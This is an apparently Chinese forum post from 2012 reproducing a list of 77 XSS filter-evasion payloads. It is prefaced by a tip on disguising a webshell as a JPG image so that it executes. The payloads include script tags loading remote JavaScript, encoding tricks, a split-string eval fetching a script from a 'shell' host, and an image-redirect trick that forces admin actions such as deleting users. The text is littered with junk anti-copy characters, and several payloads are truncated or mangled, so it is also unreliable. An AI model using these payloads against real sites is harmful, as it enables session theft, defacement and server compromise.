跨站图片shell" j, |" [( b; h- k8 Z
XSS跨站代码 <script>alert("")</script>
2 U( P) a4 s' R' o6 E
9 y- B$ N- B b0 [; a$ Y将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
% t0 f7 m( Q4 s( I2 G6 P1 y: I* t" ~! H$ a$ r
) T9 |( A1 F; g+ u+ |/ ?/ q+ z# C2 C5 n8 r
1)普通的XSS JavaScript注入3 Z) _' a6 {; k$ e% p
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>- ?/ i$ D" J8 ~0 ]( `! C+ ]
+ E/ }. f Y2 U9 S( B8 U2 }, B(2)IMG标签XSS使用JavaScript命令0 T* p1 f8 M: g5 f8 A2 n
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>+ O3 D; H& i. m) z$ N7 ^- o" W/ J, }
; r9 `! Q* d# I* a/ v; @) Q(3)IMG标签无分号无引号( C; l- c% Y5 E; i
<IMG SRC=javascript:alert(‘XSS’)>
6 W, O1 U$ N- t" n$ y$ ]; m
9 Z$ }. i: e: Q- l& e(4)IMG标签大小写不敏感
( o# s( o' _1 P5 ~/ q5 u3 \7 G0 p<IMG SRC=JaVaScRiPt:alert(‘XSS’)>( i* `) F. ] K8 c/ l
: p# B1 r5 q" Q# p(5)HTML编码(必须有分号)2 ~# f- h2 O7 n5 A
<IMG SRC=javascript:alert(“XSS”)>
. P a2 B3 P! J7 U; g% @
# ^- r5 D5 Q" {* y k(6)修正缺陷IMG标签6 l3 L0 q4 b( {6 k$ B7 l
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>: Q* t0 p' ^8 O' I# q b
4 p" s( U. O0 q% u3 m m8 }0 Q/ z: r(7)formCharCode标签(计算器)3 d* M) Z9 R v9 y4 W0 o
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>' L# h$ n; }$ ]( ~8 z- K
+ [% ?; R) P: u9 E+ m5 ?(8)UTF-8的Unicode编码(计算器)
( r8 k$ w% a5 Y' C7 g<IMG SRC=jav..省略..S')>) A7 z) B& [ o9 l% a( j: Y) r
s6 U/ x% P, S' W- |$ I7 [+ h(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
9 [4 @" y! ^& ]6 W- i7 W" J5 l<IMG SRC=jav..省略..S')>
; E5 T3 e: ^5 G1 |7 I2 i0 c
. Y ]3 M4 u8 B' g* p(10)十六进制编码也是没有分号(计算器)
. ?9 ?% {) x6 w<IMG SRC=java..省略..XSS')>/ s; w7 [8 Y* I3 M. ]. X
7 X9 `3 C0 {7 J4 S) S7 Q
(11)嵌入式标签,将Javascript分开6 ]) P7 h; J0 C) h* b2 V
<IMG SRC=”jav ascript:alert(‘XSS’);”>+ x. |! Y* i+ F9 x; i/ z4 R
3 D$ X3 z$ ]: {5 d6 b+ B(12)嵌入式编码标签,将Javascript分开5 |) M8 j& {# n1 {
<IMG SRC=”jav ascript:alert(‘XSS’);”>
8 `* J- W! L; f- H( N8 x+ H, r* F: e% T) m2 S
(13)嵌入式换行符
/ q$ v0 Q4 P6 t- K! z% w<IMG SRC=”jav ascript:alert(‘XSS’);”>& Y' u4 m; j$ l- P4 r6 R
3 [( g' M$ R6 m* N
(14)嵌入式回车
& T1 w" @+ K: ]) E' {2 `<IMG SRC=”jav ascript:alert(‘XSS’);”>
* Q/ w: |4 w6 G( j8 n _
) s: ~# j- I1 X; u* {; d; H0 \, w4 |(15)嵌入式多行注入JavaScript,这是XSS极端的例子( W' L6 u9 L J( d
<IMG SRC=”javascript:alert(‘XSS‘)”>
/ ?6 G# `+ E) K0 w. }) N4 I' A
% l- W; d4 }1 N+ D$ k# S7 N9 E(16)解决限制字符(要求同页面)" d1 A+ u* E. K7 [
<script>z=’document.’</script>
" k6 J- K9 o: }% _" o" p<script>z=z+’write(“‘</script>
* b0 l" w7 S; T( C0 O. m9 f<script>z=z+’<script’</script>
5 \/ d; x* s+ v. [; a$ g* S* u4 r. p<script>z=z+’ src=ht’</script>
% b: w" H! `% w% n' w! g, _<script>z=z+’tp://ww’</script>
0 J3 y; X( [7 q<script>z=z+’w.shell’</script>2 R% @$ f# l4 P. R) h
<script>z=z+’.net/1.’</script>
7 s8 T! F/ Q) v$ ~. l, e<script>z=z+’js></sc’</script># t5 [% B& z+ X0 E4 Y% W7 q
<script>z=z+’ript>”)’</script>: n5 V$ ^' I" g$ ~( ?+ F
<script>eval_r(z)</script>2 X9 C1 D/ Y# T6 C
1 x/ \+ Z2 [ J5 R; O; M
(17)空字符6 Z2 M3 }, H" C7 m
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out3 s& j: I2 z3 O8 ]
" ?1 ~- D+ u+ X' P(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用1 ]% |! ~5 M! b
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out) `, S. ^1 \+ P; w- s' `/ h7 T
+ J) ]" n6 w4 ^+ X) @2 q9 ^
(19)Spaces和meta前的IMG标签* R; f B d3 \# h) z+ \. ]8 ^
<IMG SRC=” javascript:alert(‘XSS’);”>! I9 k* `) ?+ b2 K- K9 R$ f; J
. }+ U/ ^3 G5 n' B& o/ i
(20)Non-alpha-non-digit XSS
8 \6 o5 ~5 L* b. v- Z( [5 `9 K" E<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>% K* @8 r O- l7 B* t: r+ g T- @. a
# J- Y! M' L7 Z(21)Non-alpha-non-digit XSS to 29 g. L7 d4 V0 R/ V/ b E- y
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
! Q0 Z; r1 ?0 G+ z) ?$ c
5 U, V0 P: a) o$ N(22)Non-alpha-non-digit XSS to 3$ t: U1 E. j4 ]$ a0 b
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>1 V' K" b, |1 |% S
( l! I" J; h* H/ _; A4 W9 a(23)双开括号- [( @% `9 e" u+ p; [% i
<<SCRIPT>alert(“XSS”);//<</SCRIPT>; H* y4 I* Q& ?( M# G {4 r$ i
: d) N R* t: g
(24)无结束脚本标记(仅火狐等浏览器)
2 M& L9 ]) Q4 r& y3 u0 x; c3 S<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
$ ?! z8 }6 S( M9 c9 a% J& t, l* W1 ]
(25)无结束脚本标记2
/ c& U1 U, h3 h L. M T8 J<SCRIPT SRC=//3w.org/XSS/xss.js>9 m3 _: o. T! K T
7 `+ M& k3 g; {! l7 ^: h& S
(26)半开的HTML/JavaScript XSS
/ R+ r% g; W! o# s<IMG SRC=”javascript:alert(‘XSS’)”* g% f: T5 ]$ A) t8 N: \7 e
C4 ^' ?1 K0 D( `: J(27)双开角括号- c6 I& s5 y/ N* A3 {
<iframe src=http://3w.org/XSS.html <
3 Z4 |7 L" ^/ P- a6 }
) {1 l1 Q0 K6 S! d4 p3 `(28)无单引号 双引号 分号* r4 A2 }# `7 q$ C* h$ _
<SCRIPT>a=/XSS/( Q# j. a- T8 D% k, t! z
alert(a.source)</SCRIPT>4 D1 _0 s! Y. g1 U. t
9 r; q8 x @6 S% T D
(29)换码过滤的JavaScript7 a# k* g0 K7 }8 n' q7 q! L/ }
\”;alert(‘XSS’);//' G( X* T! k. [ E( u
) f/ d) F# U1 g% _(30)结束Title标签
9 Z+ \( }& d# d; x/ ^' {* V: X' `! L9 k</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>( d4 M6 D' C4 T9 T# ]& m
) i$ m1 u+ M2 @% m(31)Input Image
+ J7 `' A! m6 [" h" {! }" U<INPUT SRC=”javascript:alert(‘XSS’);”>, i L( R( K' T7 j; A# d
, ^* k! c2 l( [8 E# f3 F, I, M
(32)BODY Image
. H3 [- C0 J+ ^4 M B2 C* f<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
" H* c& C* M9 T' r+ j" d1 T" }" @5 Q2 f7 P9 N h
(33)BODY标签
6 _+ J' u5 o% B2 H<BODY(‘XSS’)>
, D' \8 X$ p3 O% b' q. \
4 ~8 M! J! r/ E/ |(34)IMG Dynsrc4 Q# l$ m/ k6 i1 N) _& ^
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
# c9 u1 M! s- S9 E
/ P9 @4 y/ j, h( C/ x3 O- ~/ G: t(35)IMG Lowsrc
: m' w! S$ M& J<IMG LOWSRC=”javascript:alert(‘XSS’)”>. |% L* h/ M! t; d1 t5 a
3 f ~' Q" y s) U) U: Z/ c(36)BGSOUND& p( Y* n% e1 d" `8 F
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
g4 C7 L, ^7 N! o* c7 z# z7 g. N4 d9 C7 V ~; b$ x8 E7 M
(37)STYLE sheet2 v G% u: C( {) q8 J0 P9 b) P8 b6 P
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>, |8 z2 ?5 }" ^2 e
0 o! G# T5 l# _, q. o7 i. D
(38)远程样式表
# U9 Z8 ]1 q' D$ V+ l( ~% a M<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>7 [* Z/ h0 ]+ N
8 @* U4 [; h$ {* k6 b( i(39)List-style-image(列表式)
P5 K$ G6 F8 U; Y$ h! H<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
6 w! b# c% c" I. d# k5 ?6 d+ c
. S5 {! l9 I7 p9 [6 S3 [(40)IMG VBscript
* L3 h* [3 `5 b# c1 P$ J* H2 \<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS! U; u9 l6 S4 {& M# a" ~
6 I/ a* C2 S4 N0 i* q(41)META链接url
) V) d7 `4 M% E<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
( O3 u) m Y' |. q4 d. o; O; O5 z& p5 Q7 L4 c
(42)Iframe/ p* q& H+ }7 d' j) g
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>+ j3 V T) c; D7 V0 Q1 h
(43)Frame
8 f7 y. B& h7 G! E7 ]<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
, s! l, C6 z( ^' _
9 F5 I" b4 H; _# N3 R(44)Table7 g, R( `6 I6 [0 u1 }" i
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>) H3 E6 p4 C9 a' M! t3 j9 z! g
: g5 q: \9 r3 H
(45)TD
: m# G1 I9 x: M7 t/ `) b7 ^! l<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
. x. I$ R5 O5 _, \ n! F% V' g
\8 W, [: n, ?# P9 U(46)DIV background-image: I. u" } \1 j
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
1 C7 y: n& c, V+ X
6 s5 Y& k1 [& t) e' o3 l9 T(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
" D6 B& u' k% R a<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>- F( g: F& t* m v, G s
0 [/ F) @0 s6 t. W(48)DIV expression2 c' s5 s. ?' M8 |' I
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
6 y9 d. k1 x: O) J& a" V" l# l H/ a* k7 U
(49)STYLE属性分拆表达
( ^* {7 _+ `$ n- |: M<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
# U0 C8 u6 Y) H% B% \* h: j4 Z7 U8 n& b
(50)匿名STYLE(组成:开角号和一个字母开头)
9 R$ Q1 o4 |% z( ~7 v. h<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>4 K7 M( ?# [5 }+ W z6 s" L- L) @
0 P. K! l: o7 `& z(51)STYLE background-image/ {, C2 \$ `% T9 w7 y
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
& s9 F2 a4 a {, d7 x* q g1 c# {: T$ u
(52)IMG STYLE方式
! T+ q% s8 I# A5 E1 t- w2 K4 bexppression(alert(“XSS”))’>- f2 U; w( U b2 e( k& o1 x
2 T1 f# G9 w9 \- ?* U" T(53)STYLE background( G& D, E$ W0 U' N R% _) q. A" Q
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
; [9 A% G$ B7 T5 Y6 b5 a" w) S0 J* I, E" e( \3 ~) |
(54)BASE
, D F1 |4 I2 G) M<BASE HREF=”javascript:alert(‘XSS’);//”>2 C; D2 B1 S9 ^; U) c
& M! l# ?0 j% U6 t8 V9 F
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
/ \& ?) z! v- x3 {. B( K<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
# Q p4 O d$ G* L& l9 z( A" I* M. T6 c& N
(56)在flash中使用ActionScrpt可以混进你XSS的代码
0 ?3 S: C1 h0 l7 l5 v+ j2 G* Xa=”get”;
* M1 A9 U; K* d* V# }# gb=”URL(\”";+ m4 V9 E9 p: f- G7 |7 U1 _
c=”javascript:”;
4 Y3 o+ V5 P c) od=”alert(‘XSS’);\”)”;
: q2 q+ d% l8 c; N2 [eval_r(a+b+c+d);* W7 v! q, _, l8 w- D: @
" {- k+ _% |! G- S(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上! F7 b7 p7 Y" E$ E9 s
<HTML xmlns:xss>
+ V9 ?% v; ]; }+ p$ q) s6 j<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
: B5 w+ N3 w; l; p$ i4 V3 d2 D<xss:xss>XSS</xss:xss>/ s1 F. T$ n1 v: b7 w; N. i5 d
</HTML>( ~6 ]2 {+ d. I
9 j: \. K5 F4 H* C; r' D3 U
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
5 ] m: _7 l) e/ F<SCRIPT SRC=””></SCRIPT>9 m: a' ?- p& G
3 j/ V/ H; E) d4 p- o8 b. t
(59)IMG嵌入式命令,可执行任意命令
6 k/ D6 y# I Q/ x3 s A: H<IMG SRC=”http://www.XXX.com/a.php?a=b”>( ]( l- Z2 V; N) }/ }& M: J; b
" M# q, N, D* S" C' @/ a(60)IMG嵌入式命令(a.jpg在同服务器)) n3 \. d4 r6 ?' t y
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
, r7 s* \" h3 }
! {: l- o7 w$ ^3 }7 a) S(61)绕符号过滤
1 F( o" J- i& T6 Q2 O3 _* g& r<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>/ E2 f3 b7 L) H! C
: D# a* d$ |- `8 }
(62), R3 ~. G& x% `+ F0 @7 t4 }
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
, ?9 |$ ^9 s6 z, t7 E! R/ Z7 J9 R8 a4 t5 {- T+ F: `- U
(63)7 i. ^3 K, {* b2 x% A
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>1 A1 {- _8 {: o" W0 K3 e+ K3 v
; N* G. k; e* }& }! q) r9 m1 \(64)
5 D' y& ~8 s0 v6 N<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>: B4 n/ l: l. g# z+ v- w4 a
1 W+ C" g1 r( s! P4 v# J8 k( j- `
(65)) P& a. c* K1 I( {% L7 C+ N% U
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>/ e. u/ z3 \7 y' d5 s
) W5 L; @& {6 b8 t
(66)
) J; A2 I w( x5 ^. u5 w<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
' f+ R b) s5 k0 M$ A; d- Y+ v8 C' ?2 ^6 c' j
(67); T, b' z6 F& t2 G( B- k% r
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
2 c6 Q" l+ V* {6 m7 N8 D
7 [% A, K, N" B/ Z' V. W8 K(68)URL绕行
* c* W' L& Q; \( j, [: p<A HREF=”http://127.0.0.1/”>XSS</A>
* V" T9 w- N5 t& r {8 p5 H
2 N# x6 b6 ]% O(69)URL编码
3 |# ]) ]+ q8 V<A HREF=”http://3w.org”>XSS</A>* d! a( E$ r" x& f( r% h0 j
4 d3 ?: y/ v' d* H$ J(70)IP十进制# M' t, d L. x; n0 m3 W% Q0 B
<A HREF=”http://3232235521″>XSS</A>( U( ~: }0 J s: V& A
+ \! x5 q3 \2 Z# O2 r5 X(71)IP十六进制& |! t, ^- x0 R( }! y' e/ b8 Q' |
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>2 w0 S, }! [4 ?
. ]; s+ V& a; X% e7 ~, }& k(72)IP八进制0 Y! b: j8 ~7 v4 g* r1 p
<A HREF=”http://0300.0250.0000.0001″>XSS</A>- T( v+ X! y( C) `9 v
2 a4 Z. l+ F d# C7 n/ ~* ? F(73)混合编码
! y7 V& [: L1 ^6 g9 W: p% b1 ^$ p5 M<A HREF=”h
' l) D. m/ O$ u4 Q7 k, S3 ctt p://6 6.000146.0×7.147/”">XSS</A>
5 ?8 O8 E( ?1 `; e* [" D' S9 c. u
5 M7 z/ z: P, d5 L; r; \(74)节省[http:]
* D2 r# Q2 X3 }% ?) v- u L<A HREF=”//www.google.com/”>XSS</A>1 l/ i! \ S; g. j) J! o6 A
3 ^6 m. k3 d) z! A
(75)节省[www]8 W! K! Y- d, }, M% l6 C
<A HREF=”http://google.com/”>XSS</A>
$ p% U- i' [" ~( v$ t" Y
+ p6 h/ F- Y, B: z9 S(76)绝对点绝对DNS! O6 M% D" A+ _8 D" F
<A HREF=”http://www.google.com./”>XSS</A>. M- T4 F. ^1 c) R% H- }" J
- E. T1 ^& Q- @- u% K
(77)javascript链接
5 V7 V t) c% P$ j( N$ N7 |6 N1 Y8 {<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
- Y8 o& m8 a4 s |
发表于 2012-9-13 17:04:56
收藏
支持
反对